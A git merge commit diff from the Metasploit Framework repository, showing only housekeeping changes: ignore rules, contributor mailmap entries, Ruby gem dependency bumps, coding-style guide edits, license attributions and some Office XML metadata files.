Merge remote-tracking branch 'upstream/master' into powershell_auto_arch

Conflicts:
	lib/msf/util/exe.rb
bug/bundler_fix
Meatballs 2013-12-16 09:07:08 +00:00
commit 7cc99d76ad
No known key found for this signature in database
GPG Key ID: 5380EAF01F2F8B38
3173 changed files with 76212 additions and 51130 deletions

17
.gitignore vendored
View File

@ -3,10 +3,7 @@
.idea
# Sublime Text project directory (not created by ST by default)
.sublime-project
# Portable ruby version files for rvm
.ruby-gemset
.ruby-version
# RVM control file
# RVM control file, keep this to avoid backdooring Metasploit
.rvmrc
# YARD cache directory
.yardoc
@ -16,7 +13,7 @@
config/database.yml
# simplecov coverage data
coverage
data/meterpreter/ext_server_pivot.dll
data/meterpreter/ext_server_pivot.x86.dll
data/meterpreter/ext_server_pivot.x64.dll
doc/
external/source/meterpreter/java/bin
@ -44,3 +41,13 @@ tags
*~
# Ignore backups of retabbed files
*.notab
# ignore Visual Studio external source garbage
*.suo
*.sdf
*.opensdf
*.user
# ignore release/debug folders for exploits
external/source/exploits/**/Debug
external/source/exploits/**/Release

3
.gitmodules vendored Normal file
View File

@ -0,0 +1,3 @@
[submodule "external/source/ReflectiveDLLInjection"]
path = external/source/ReflectiveDLLInjection
url = https://github.com/rapid7/ReflectiveDLLInjection.git

View File

@ -1,50 +1,54 @@
bperry-r7 <bperry-r7@github> Brandon Perry <bperry.volatile@gmail.com>
bperry-r7 <bperry-r7@github> Brandon Perry <bperry@bperry-rapid7.(none)>
bturner-r7 <bturner-r7@github> Brandon Turner <brandon_turner@rapid7.com>
dmaloney-r7 <dmaloney-r7@github> David Maloney <DMaloney@rapid7.com> # aka TheLightCosine
dmaloney-r7 <dmaloney-r7@github> David Maloney <David_Maloney@rapid7.com>
dmaloney-r7 <dmaloney-r7@github> David Maloney <DMaloney@rapid7.com> # aka TheLightCosine
ecarey-r7 <ecarey-r7@github> Erran Carey <e@ipwnstuff.com>
hmoore-r7 <hmoore-r7@github> HD Moore <hd_moore@rapid7.com>
hmoore-r7 <hmoore-r7@github> HD Moore <hdm@digitaloffense.net>
jlee-r7 <jlee-r7@github> James Lee <James_Lee@rapid7.com>
jlee-r7 <jlee-r7@github> James Lee <egypt@metasploit.com> # aka egypt
jlee-r7 <jlee-r7@github> egypt <egypt@metasploit.com> # aka egypt
jlee-r7 <jlee-r7@github> James Lee <egypt@metasploit.com> # aka egypt
jlee-r7 <jlee-r7@github> James Lee <James_Lee@rapid7.com>
joev-r7 <joev-r7@github> joev <joev@metasploit.com>
joev-r7 <joev-r7@github> Joe Vennix <Joe_Vennix@rapid7.com>
jvazquez-r7 <jvazquez-r7@github> jvazquez-r7 <juan.vazquez@metasploit.com>
jvazquez-r7 <jvazquez-r7@github> jvazquez-r7 <juan_vazquez@rapid7.com>
limhoff-r7 <limhoff-r7@github> Luke Imhoff <luke_imhoff@rapid7.com>
shuckins-r7 <shuckins-r7@github> Samuel Huckins <samuel_huckins@rapid7.com>
tasos-r7 <tasos-r7@github> Tasos Laskos <Tasos_Laskos@rapid7.com>
todb-r7 <todb-r7@github> Tod Beardsley <tod_beardsley@rapid7.com>
todb-r7 <todb-r7@github> Tod Beardsley <todb@metasploit.com>
wchen-r7 <wchen-r7@github> Wei Chen <Wei_Chen@rapid7.com>
wchen-r7 <wchen-r7@github> sinn3r <msfsinn3r@gmail.com> # aka sinn3r
wchen-r7 <wchen-r7@github> sinn3r <wei_chen@rapid7.com>
wchen-r7 <wchen-r7@github> Wei Chen <Wei_Chen@rapid7.com>
wvu-r7 <wvu-r7@github> William Vu <William_Vu@rapid7.com>
wvu-r7 <wvu-r7@github> William Vu <wvu@metasploit.com>
# Above this line are current Rapid7 employees Below this paragraph are
# Above this line are current Rapid7 employees. Below this paragraph are
# volunteers, former employees, and potential Rapid7 employees who, at
# one time or another, had some largeish number of commits landed on
# rapid7/metasploit-framework master branch. This should be refreshed
# periodically. If you're on this list and would like to not be, just
# let todb@metasploit.com know.
bannedit <bannedit@github> David Rude <bannedit0@gmail.com>
Brandon Perry <brandonprry@github> Brandon Perry <bperry.volatile@gmail.com>
Brandon Perry <brandonprry@github> Brandon Perry <bperry@bperry-rapid7.(none)>
Brian Wallace <bwall@github> (B)rian (Wall)ace <nightstrike9809@gmail.com>
Brian Wallace <bwall@github> Brian Wallace <bwall@openbwall.com>
ceballosm <ceballosm@github> Mario Ceballos <mc@metasploit.com>
Chao-mu <Chao-Mu@github> Chao Mu <chao.mu@minorcrash.com>
Chao-mu <Chao-Mu@github> chao-mu <chao.mu@minorcrash.com>
Chao-mu <Chao-Mu@github> chao-mu <chao@confusion.(none)>
ChrisJohnRiley <ChrisJohnRiley@github> Chris John Riley <chris.riley@c22.cc>
ChrisJohnRiley <ChrisJohnRiley@github> Chris John Riley <reg@c22.cc>
FireFart <FireFart@github> Christian Mehlmauer <firefart@gmail.com>
Meatballs1 <Meatballs1@github> Ben Campbell <eat_meatballs@hotmail.co.uk>
Meatballs1 <Meatballs1@github> Meatballs <eat_meatballs@hotmail.co.uk>
Meatballs1 <Meatballs1@github> Meatballs1 <eat_meatballs@hotmail.co.uk>
bannedit <bannedit@github> David Rude <bannedit0@gmail.com>
ceballosm <ceballosm@github> Mario Ceballos <mc@metasploit.com>
corelanc0d3er <corelanc0d3er@github> Peter Van Eeckhoutte (corelanc0d3r) <peter.ve@corelan.be>
corelanc0d3er <corelanc0d3er@github> corelanc0d3r <peter.ve@corelan.be>
corelanc0d3r <corelanc0d3r@github> corelanc0d3r <peter.ve@corelan.be>
corelanc0d3r <corelanc0d3r@github> Peter Van Eeckhoutte (corelanc0d3r) <peter.ve@corelan.be>
darkoperator <darkoperator@github> Carlos Perez <carlos_perez@darkoperator.com>
efraintorres <efraintorres@github> efraintorres <etlownoise@gmail.com>
efraintorres <efraintorres@github> et <>
fab <fab@???> fab <> # fab at revhosts.net (Fabrice MOURRON)
h0ng10 <h0ng10@github> Hans-Martin Münch <hansmartin.muench@googlemail.com>
FireFart <FireFart@github> Christian Mehlmauer <firefart@gmail.com>
h0ng10 <h0ng10@github> h0ng10 <hansmartin.muench@googlemail.com>
h0ng10 <h0ng10@github> Hans-Martin Münch <hansmartin.muench@googlemail.com>
jcran <jcran@github> Jonathan Cran <jcran@0x0e.org>
jcran <jcran@github> Jonathan Cran <jcran@rapid7.com>
jduck <jduck@github> Joshua Drake <github.jdrake@qoop.org>
@ -56,11 +60,16 @@ kris <kris@???> kris <>
m-1-k-3 <m-1-k-3@github> m-1-k-3 <github@s3cur1ty.de>
m-1-k-3 <m-1-k-3@github> m-1-k-3 <m1k3@s3cur1ty.de>
m-1-k-3 <m-1-k-3@github> m-1-k-3 <michael.messner@integralis.com>
Meatballs1 <Meatballs1@github> Ben Campbell <eat_meatballs@hotmail.co.uk>
Meatballs1 <Meatballs1@github> Meatballs <eat_meatballs@hotmail.co.uk>
Meatballs1 <Meatballs1@github> Meatballs1 <eat_meatballs@hotmail.co.uk>
mubix <mubix@github> Rob Fuller <jd.mubix@gmail.com>
nevdull77 <nevdull77@github> Patrik Karlsson <patrik@cqure.net>
nmonkee <nmonkee@github> nmonkee <dave@northern-monkee.co.uk>
nullbind <nullbind@github> nullbind <scott.sutherland@nullbind.com>
ohdae <ohdae@github> ohdae <bindshell@live.com>
OJ <oj@github> OJ Reeves <oj@buffered.io>
OJ <oj@github> OJ <oj@buffered.io>
r3dy <r3dy@github> Royce Davis <r3dy@Royces-MacBook-Pro.local>
r3dy <r3dy@github> Royce Davis <royce.e.davis@gmail.com>
rsmudge <rsmudge@github> Raphael Mudge <rsmudge@gmail.com> # Aka `butane

2
.rspec
View File

@ -1,2 +1,2 @@
--color
--format documentation
--format Fivemat

1
.ruby-gemset Normal file
View File

@ -0,0 +1 @@
metasploit-framework

1
.ruby-version Normal file
View File

@ -0,0 +1 @@
1.9.3-p484

View File

@ -15,4 +15,4 @@ notifications:
irc: "irc.freenode.org#msfnotify"
git:
depth: 1
depth: 5

69
Gemfile
View File

@ -1,4 +1,4 @@
source 'http://rubygems.org'
source 'https://rubygems.org'
# Need 3+ for ActiveSupport::Concern
gem 'activesupport', '>= 3.0.0'
@ -11,52 +11,53 @@ gem 'nokogiri'
# Needed by anemone crawler
gem 'robots'
# Needed by db.rb and Msf::Exploit::Capture
gem 'packetfu', '1.1.8'
gem 'packetfu', '1.1.9'
group :db do
# Needed for Msf::DbManager
gem 'activerecord'
# Database models shared between framework and Pro.
gem 'metasploit_data_models', '~> 0.16.6'
# Needed for module caching in Mdm::ModuleDetails
gem 'pg', '>= 0.11'
# Needed for Msf::DbManager
gem 'activerecord'
# Database models shared between framework and Pro.
gem 'metasploit_data_models', '~> 0.16.6'
# Needed for module caching in Mdm::ModuleDetails
gem 'pg', '>= 0.11'
end
group :pcap do
gem 'network_interface', '~> 0.0.1'
# For sniffer and raw socket modules
gem 'pcaprub'
# For sniffer and raw socket modules
gem 'pcaprub'
end
group :development do
# Markdown formatting for yard
gem 'redcarpet'
# generating documentation
gem 'yard'
# Markdown formatting for yard
gem 'redcarpet'
# generating documentation
gem 'yard'
end
group :development, :test do
# supplies factories for producing model instance for specs
# Version 4.1.0 or newer is needed to support generate calls without the
# 'FactoryGirl.' in factory definitions syntax.
gem 'factory_girl', '>= 4.1.0'
# running documentation generation tasks and rspec tasks
gem 'rake'
# supplies factories for producing model instance for specs
# Version 4.1.0 or newer is needed to support generate calls without the
# 'FactoryGirl.' in factory definitions syntax.
gem 'factory_girl', '>= 4.1.0'
# Make rspec output shorter and more useful
gem 'fivemat', '1.2.1'
# running documentation generation tasks and rspec tasks
gem 'rake', '>= 10.0.0'
end
group :test do
# Removes records from database created during tests. Can't use rspec-rails'
# transactional fixtures because multiple connections are in use so
# transactions won't work.
gem 'database_cleaner'
# testing framework
gem 'rspec', '>= 2.12'
# add matchers from shoulda, such as query_the_database, which is useful for
# testing that the Msf::DBManager activation is respected.
gem 'shoulda-matchers'
# code coverage for tests
# any version newer than 0.5.4 gives an Encoding error when trying to read the source files.
gem 'simplecov', '0.5.4', :require => false
# Manipulate Time.now in specs
gem 'timecop'
# Removes records from database created during tests. Can't use rspec-rails'
# transactional fixtures because multiple connections are in use so
# transactions won't work.
gem 'database_cleaner'
# testing framework
gem 'rspec', '>= 2.12'
gem 'shoulda-matchers'
# code coverage for tests
# any version newer than 0.5.4 gives an Encoding error when trying to read the source files.
# see: https://github.com/colszowka/simplecov/issues/127 (hopefully fixed in 0.8.0)
gem 'simplecov', '0.5.4', :require => false
# Manipulate Time.now in specs
gem 'timecop'
end

View File

@ -1,62 +1,59 @@
GEM
remote: http://rubygems.org/
remote: https://rubygems.org/
specs:
activemodel (3.2.13)
activesupport (= 3.2.13)
activemodel (3.2.14)
activesupport (= 3.2.14)
builder (~> 3.0.0)
activerecord (3.2.13)
activemodel (= 3.2.13)
activesupport (= 3.2.13)
activerecord (3.2.14)
activemodel (= 3.2.14)
activesupport (= 3.2.14)
arel (~> 3.0.2)
tzinfo (~> 0.3.29)
activesupport (3.2.13)
i18n (= 0.6.1)
activesupport (3.2.14)
i18n (~> 0.6, >= 0.6.4)
multi_json (~> 1.0)
arel (3.0.2)
bourne (1.4.0)
mocha (~> 0.13.2)
builder (3.0.4)
database_cleaner (0.9.1)
diff-lcs (1.2.2)
database_cleaner (1.1.1)
diff-lcs (1.2.4)
factory_girl (4.2.0)
activesupport (>= 3.0.0)
i18n (0.6.1)
json (1.7.7)
metaclass (0.0.1)
fivemat (1.2.1)
i18n (0.6.5)
json (1.8.0)
metasploit_data_models (0.16.6)
activerecord (>= 3.2.13)
activesupport
pg
mocha (0.13.3)
metaclass (~> 0.0.1)
msgpack (0.5.4)
mini_portile (0.5.1)
msgpack (0.5.5)
multi_json (1.0.4)
network_interface (0.0.1)
nokogiri (1.5.9)
packetfu (1.1.8)
nokogiri (1.6.0)
mini_portile (~> 0.5.0)
packetfu (1.1.9)
pcaprub (0.11.3)
pg (0.15.1)
rake (10.0.4)
redcarpet (2.2.2)
pg (0.16.0)
rake (10.1.0)
redcarpet (3.0.0)
robots (0.10.1)
rspec (2.13.0)
rspec-core (~> 2.13.0)
rspec-expectations (~> 2.13.0)
rspec-mocks (~> 2.13.0)
rspec-core (2.13.1)
rspec-expectations (2.13.0)
rspec (2.14.1)
rspec-core (~> 2.14.0)
rspec-expectations (~> 2.14.0)
rspec-mocks (~> 2.14.0)
rspec-core (2.14.5)
rspec-expectations (2.14.2)
diff-lcs (>= 1.1.3, < 2.0)
rspec-mocks (2.13.0)
shoulda-matchers (1.5.2)
rspec-mocks (2.14.3)
shoulda-matchers (2.3.0)
activesupport (>= 3.0.0)
bourne (~> 1.3)
simplecov (0.5.4)
multi_json (~> 1.0.3)
simplecov-html (~> 0.5.3)
simplecov-html (0.5.3)
timecop (0.6.1)
timecop (0.6.3)
tzinfo (0.3.37)
yard (0.8.5.2)
yard (0.8.7)
PLATFORMS
ruby
@ -66,15 +63,16 @@ DEPENDENCIES
activesupport (>= 3.0.0)
database_cleaner
factory_girl (>= 4.1.0)
fivemat (= 1.2.1)
json
metasploit_data_models (~> 0.16.6)
msgpack
network_interface (~> 0.0.1)
nokogiri
packetfu (= 1.1.8)
packetfu (= 1.1.9)
pcaprub
pg (>= 0.11)
rake
rake (>= 10.0.0)
redcarpet
robots
rspec (>= 2.12)

58
HACKING
View File

@ -9,8 +9,8 @@ Code Style
In order to maintain consistency and readability, we ask that you
adhere to the following style guidelines:
- Hard tabs, not spaces
- Try to keep your lines under 100 columns (assuming four-space tabs)
- Standard Ruby two-space soft tabs, not hard tabs.
- Try to keep your lines under 100 columns (assuming two-space tabs)
- do; end instead of {} for a block
- Always use str[0,1] instead of str[0]
(This avoids a known ruby 1.8/1.9 incompatibility.)
@ -36,13 +36,7 @@ lock up the entire module when called from other interfaces. If you
need user input, you can either register an option or expose an
interactive session type specific for the type of exploit.
3. Don't use "sleep". It has been known to cause issues with
multi-threaded programs on various platforms running an older version of
Ruby such as 1.8. Instead, we use "select(nil, nil, nil, <time>)" or
Rex.sleep() throughout the framework. We have found this works around
the underlying issue.
4. Always use Rex sockets, not ruby sockets. This includes
3. Always use Rex sockets, not ruby sockets. This includes
third-party libraries such as Net::Http. There are several very good
reasons for this rule. First, the framework doesn't get notified on
the creation of ruby sockets and won't know how to clean them up in
@ -54,48 +48,48 @@ already implemented with Rex and if the protocol you need is missing,
porting another library to use them is straight-forward. See our
Net::SSH modifications in lib/net/ssh/ for an example.
5. When opening an IO stream, always force binary with "b" mode (or
4. When opening an IO stream, always force binary with "b" mode (or
using IO#binmode). This not only helps keep Windows and non-Windows
runtime environments consistent with each other, but also guarantees
that files will be treated as ASCII-8BIT instead of UTF-8.
6. Don't use String#[] for a single character. This returns a Fixnum in
5. Don't use String#[] for a single character. This returns a Fixnum in
ruby 1.8 and a String in 1.9, so it's safer to use the following idiom:
str[idx,1]
str[idx,1]
which always returns a String. If you need the ASCII byte, unpack it like
so:
str[idx,1].unpack("C")[0]
so:
tr[idx,1].unpack("C")[0]
7. Whenever possible, avoid using '+' or '+=' to concatenate strings.
6. Whenever possible, avoid using '+' or '+=' to concatenate strings.
The '<<' operator is significantly faster. The difference will become
even more apparent when doing string manipulation in a loop. The
following table approximates the underlying implementation:
Ruby Pseudo-C
----------- ----------------
a = b + c a = malloc(b.len+c.len+1);
strcpy(a, b);
memcpy(a+b.len, c, c.len);
a[b.len + c.len] = '\0';
a = b a = b;
a << c a = realloc(a, a.len+c.len+1);
memcpy(a+a.len, c, c.len);
a[a.len + c.len] = '\0';
Ruby Pseudo-C
----------- ----------------
a = b + c a = malloc(b.len+c.len+1);
strcpy(a, b);
memcpy(a+b.len, c, c.len);
a[b.len + c.len] = '\0';
a = b a = b;
a << c a = realloc(a, a.len+c.len+1);
memcpy(a+a.len, c, c.len);
a[a.len + c.len] = '\0';
Note that the original value of 'b' is lost in the second case. Care
must be taken to duplicate strings that you do not want to modify.
8. For other Ruby 1.8.x/1.9.x compat issues, please see Sam Ruby's
7. For other Ruby 1.8.x/1.9.x compat issues, please see Sam Ruby's
excellent slide show at <http://slideshow.rubyforge.org/ruby19.html>
for an overview of common and not-so-common Ruby version related gotchas.
9. Never, ever use $global variables. This applies to modules, mixins,
8. Never, ever use $global variables. This applies to modules, mixins,
and libraries. If you need a "global" within a specific class, you can
use @@class_variables, but most modules should use @instance variables
to store information between methods.
10. Do not define CONSTANTS within individual modules. This can lead to
warning messages when the module is reloaded. Try to keep constants
inside libraries and mixins instead.
to store information between methods.
9. Don't craft your XML document raw or by using Nokogiri, the current
preferred way is REXML.
Creating New Modules
====================

347
LICENSE
View File

@ -12,7 +12,7 @@ License: BSD-3-clause
#
# This license does not apply to third-party components detailed below.
#
# Last updated: 2013-Mar-25
# Last updated: 2013-Nov-04
#
Files: data/john/*
@ -166,230 +166,6 @@ Files: lib/fastlib.rb
Copyright: 2011, Rapid7 Inc.
License: Ruby
Files: lib/gemcache/ruby/1.9.1/arch/*/eventmachine-*/*
Copyright: 2006-2007, Francis Cianfrocca
License: Ruby
Files: lib/gemcache/ruby/1.9.1/arch/*/json-*/*
Copyright: Daniel Luz <dev at mernen dot com>
License: Ruby
Files: lib/gemcache/ruby/1.9.1/arch/*/msgpack-*/*
Copyright: Austin Ziegler
License: Ruby
Files: lib/gemcache/ruby/1.9.1/arch/*/nokogiri-*/*
Copyright: 2008 - 2012 Aaron Patterson, Mike Dalessio, Charles Nutter, Sergio Arbeo, Patrick Mahoney, Yoko Harada
License: MIT
Files: lib/gemcache/ruby/1.9.1/arch/*/pg-*/*
Copyright: 1997-2012 by the authors
License: Ruby
Files: lib/gemcache/ruby/1.9.1/arch/*/thin-*/*
Copyright: Marc-Andre Cournoyer
License: Ruby
Files: lib/gemcache/ruby/1.9.1/arch/*/win32-api-*/*
Copyright: 2003-2011, Daniel J. Berger
License: Artistic
Files: lib/gemcache/ruby/1.9.1/arch/*/win32-service-*/*
Copyright: 2003-2011, Daniel J. Berger
License: Artistic
Files: lib/gemcache/ruby/1.9.1/arch/*/windows-api-*/*
Copyright: 2007-2012, Daniel J. Berger
License: Artistic
Files: lib/gemcache/ruby/1.9.1/arch/*/windows-pr-*/*
Copyright: 2006-2010, Daniel J. Berger
License: Artistic
Files: lib/gemcache/ruby/1.9.1/gems/coderay-*/*
Copyright: 2006-2011, murphy (Kornelius Kalnback) <murphy rubychan de>
License: LGPL-2.1
Files: lib/gemcache/ruby/1.9.1/gems/actionmailer-*/*
Copyright: 2004-2011 David Heinemeier Hansson
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/actionpack-*/*
Copyright: 2004-2011 David Heinemeier Hansson
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/activemodel-*/*
Copyright: 2004-2011 David Heinemeier Hansson
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/activerecord-*/*
Copyright: 2004-2011 David Heinemeier Hansson
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/activeresource-*/*
Copyright: 2006-2011 David Heinemeier Hansson
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/activesupport-*/*
Copyright: 2005-2011 David Heinemeier Hansson
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/acts_as_list-*/*
Copyright: 2007 David Heinemeir Hansson
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/arel-*/*
Copyright: 2007-2010 Nick Kallen, Bryan Helmkamp, Emilio Tagua, Aaron Patterson
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/authlogic-*/*
Copyright: 2011 Ben Johnson of Binary Logic
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/builder-*/*
Copyright: 2003-2012 Jim Weirich (jim.weirich@gmail.com)
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/carrierwave-*/*
Copyright: 2008-2012 Jonas Nicklas
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/chunky_png-*/*
Copyright: 2010 Willem van Bergen
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/coderay-*/*
Copyright: Rob Aldred
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/daemons-*/*
Copyright: 2005-2012 Thomas Uehlinger
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/diff-lcs-*/*
Copyright: 2004-2011 Austin Ziegler
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/erubis-*/*
Copyright: 2006-2011 kuwata-lab.com all rights reserved
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/formtastic-*/*
Copyright: 2008-2010
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/fssm-*/*
Copyright: 2011 Travis Tilley
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/hike-*/*
Copyright: 2011 Sam Stephenson
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/i18n-*/*
Copyright: 2008 The Ruby I18n team
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/ice_cube-*/*
Copyright: 2010-2012 John Crepezzi
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/journey-*/*
Copyright: 2011 Aaron Patternson
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/jquery-rails-*/*
Copyright: 2010 Andre Arko
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/liquid-*/*
Copyright: 2005, 2006 Tobias Luetke
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/mail-*/*
Copyright: 2009, 2010, 2011, 2012 Mikel Lindsaar
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/metasploit_data_modules-*/*
Copyright: 2012 Rapid7, Inc.
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/method_source-*/*
Copyright: 2011 John Mair (banisterfiend)
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/multi_json-*/*
Copyright: 2010 Michael Bleigh, Josh Kalderimis, Erik Michaels-Ober, and Intridea, Inc.
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/polyglot-*/*
Copyright: 2007 Clifford Heath
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/prototype_legacy_helper-*/*
Copyright: No copyright statement provided (unmaintained per https://github.com/rails/prototype_legacy_helper)
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/rack-*/*
Copyright: 2007-2010 Christian Neukirchen <purl.org/net/chneukirchen>
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/rack-cache-*/*
Copyright: 2008 Ryan Tomayko <http://tomayko.com/about>
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/rack-ssl-*/*
Copyright: 2010 Joshua Peek
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/rack-test-*/*
Copyright: 2008-2009 Bryan Helmkamp, Engine Yard Inc.
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/railties-*/*
Copyright: No copyright statement provided
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/rake-*/*
Copyright: 2003, 2004 Jim Weirich
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/robots-*/*
Copyright: 2008 Kyle Maxwell, contributors
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/slop-*/*
Copyright: 2012 Lee Jarvis
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/spork-*/*
Copyright: 2009 Tim Harper
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/sprockets-*/*
Copyright: 2011 Sam Stephenson, Joshua Peek
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/state_machine-*/*
Copyright: 2006-2012 Aaron Pfeifer
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/thor-*/*
Copyright: 2008 Yehuda Katz
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/tilt-*/*
Copyright: 2010 Ryan Tomayko <http://tomayko.com/about>
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/treetop-*/*
Copyright: 2007 Nathan Sobo
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/tzinfo-*/*
Copyright: 2005-2006 Philip Ross
License: MIT
Files: lib/metasm.rb lib/metasm/* data/cpuinfo/*
Copyright: 2006-2010 Yoann GUILLOT
License: LGPL-2.1
@ -454,6 +230,127 @@ Files: modules/payloads/singles/windows/speak_pwned.rb
Copyright: 2009-2010 Berend-Jan "SkyLined" Wever <berendjanwever@gmail.com>
License: BSD-3-clause
#
# Gems
#
Files: activemodel
Copyright: 2004-2011 David Heinemeier Hansson
License: MIT
Files: activerecord
Copyright: 2004-2011 David Heinemeier Hansson
License: MIT
Files: activesupport
Copyright: 2005-2011 David Heinemeier Hansson
License: MIT
Files: arel
Copyright: 2007-2010 Nick Kallen, Bryan Helmkamp, Emilio Tagua, Aaron Patterson
License: MIT
Files: builder
Copyright: 2003-2012 Jim Weirich (jim.weirich@gmail.com)
License: MIT
Files: database_cleaner
Copyright: 2009 Ben Mabey
License: MIT
Files: diff-lcs
Copyright: 2004-2011 Austin Ziegler
License: MIT
Files: factory_girl
Copyright: 2008-2013 Joe Ferris and thoughtbot, inc.
License: MIT
Files: fivemat
Copyright: 2012 Tim Pope
License: MIT
Files: i18n
Copyright: 2008 The Ruby I18n team
License: MIT
Files: json
Copyright: Daniel Luz <dev at mernen dot com>
License: Ruby
Files: metasploit_data_models
Copyright: 2012 Rapid7, Inc.
License: MIT
Files: mini_portile
Copyright: 2011 Luis Lavena
License: MIT
Files: msgpack
Copyright: Austin Ziegler
License: Ruby
Files: multi_json
Copyright: 2010 Michael Bleigh, Josh Kalderimis, Erik Michaels-Ober, and Intridea, Inc.
License: MIT
Files: network_interface
Copyright: 2012, Rapid7, Inc.
License: MIT
Files: nokogiri
Copyright: 2008 - 2012 Aaron Patterson, Mike Dalessio, Charles Nutter, Sergio Arbeo, Patrick Mahoney, Yoko Harada
License: MIT
Files: packetfu
Copyright: 2008-2012 Tod Beardsley
License: BSD-3-clause
Files: pcaprub
Copyright: 2007-2008, Alastair Houghton
License: LGPL-2.1
Files: pg
Copyright: 1997-2012 by the authors
License: Ruby
Files: rake
Copyright: 2003, 2004 Jim Weirich
License: MIT
Files: redcarpet
Copyright: 2009 Natacha Porté
License: MIT
Files: robots
Copyright: 2008 Kyle Maxwell, contributors
License: MIT
Files: rspec
Copyright: 2009 Chad Humphries, David Chelimsky
License: MIT
Files: shoulda-matchers
Copyright: 2006-2013, Tammer Saleh, thoughtbot, inc.
License: MIT
Files: simplecov
Copyright: 2010-2012 Christoph Olszowka
License: MIT
Files: timecop
Copyright: 2012 Travis Jeffery, John Trupiano
License: MIT
Files: tzinfo
Copyright: 2005-2006 Philip Ross
License: MIT
Files: yard
Copyright: 2007-2013 Loren Segal
License: MIT
License: BSD-2-clause
Redistribution and use in source and binary forms, with or without modification,
are permitted provided that the following conditions are met:

Binary file not shown.

Binary file not shown.

View File

@ -0,0 +1,6 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
<Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/extended-properties" Target="docProps/app.xml"/>
<Relationship Id="rId2" Type="http://schemas.openxmlformats.org/package/2006/relationships/metadata/core-properties" Target="docProps/core.xml"/>
<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/officeDocument" Target="word/document.xml"/>
</Relationships>

View File

@ -0,0 +1,19 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/extended-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes">
<Template>Normal.dotm</Template>
<TotalTime>4</TotalTime>
<Pages>1</Pages>
<Words>217</Words>
<Characters>1238</Characters>
<Application>Microsoft Office Word</Application>
<DocSecurity>0</DocSecurity>
<Lines>10</Lines>
<Paragraphs>2</Paragraphs>
<ScaleCrop>false</ScaleCrop>
<Company>home</Company>
<LinksUpToDate>false</LinksUpToDate>
<CharactersWithSpaces>1453</CharactersWithSpaces>
<SharedDoc>false</SharedDoc>
<HyperlinksChanged>false</HyperlinksChanged>
<AppVersion>12.0000</AppVersion>
</Properties>

View File

@ -0,0 +1,8 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<cp:coreProperties xmlns:cp="http://schemas.openxmlformats.org/package/2006/metadata/core-properties" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:dcterms="http://purl.org/dc/terms/" xmlns:dcmitype="http://purl.org/dc/dcmitype/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<dc:creator>Win7</dc:creator>
<cp:lastModifiedBy>Win7</cp:lastModifiedBy>
<cp:revision>1</cp:revision>
<dcterms:created xsi:type="dcterms:W3CDTF">2013-10-03T22:46:00Z</dcterms:created>
<dcterms:modified xsi:type="dcterms:W3CDTF">2013-10-03T23:17:00Z</dcterms:modified>
</cp:coreProperties>

View File

@ -0,0 +1,4 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/package" Target="../embeddings/Microsoft_Office_Excel_Worksheet1.xlsx"/>
</Relationships>

View File

@ -0,0 +1,4 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/package" Target="../embeddings/Microsoft_Office_Excel_Worksheet2.xlsx"/>
</Relationships>

View File

@ -0,0 +1,4 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
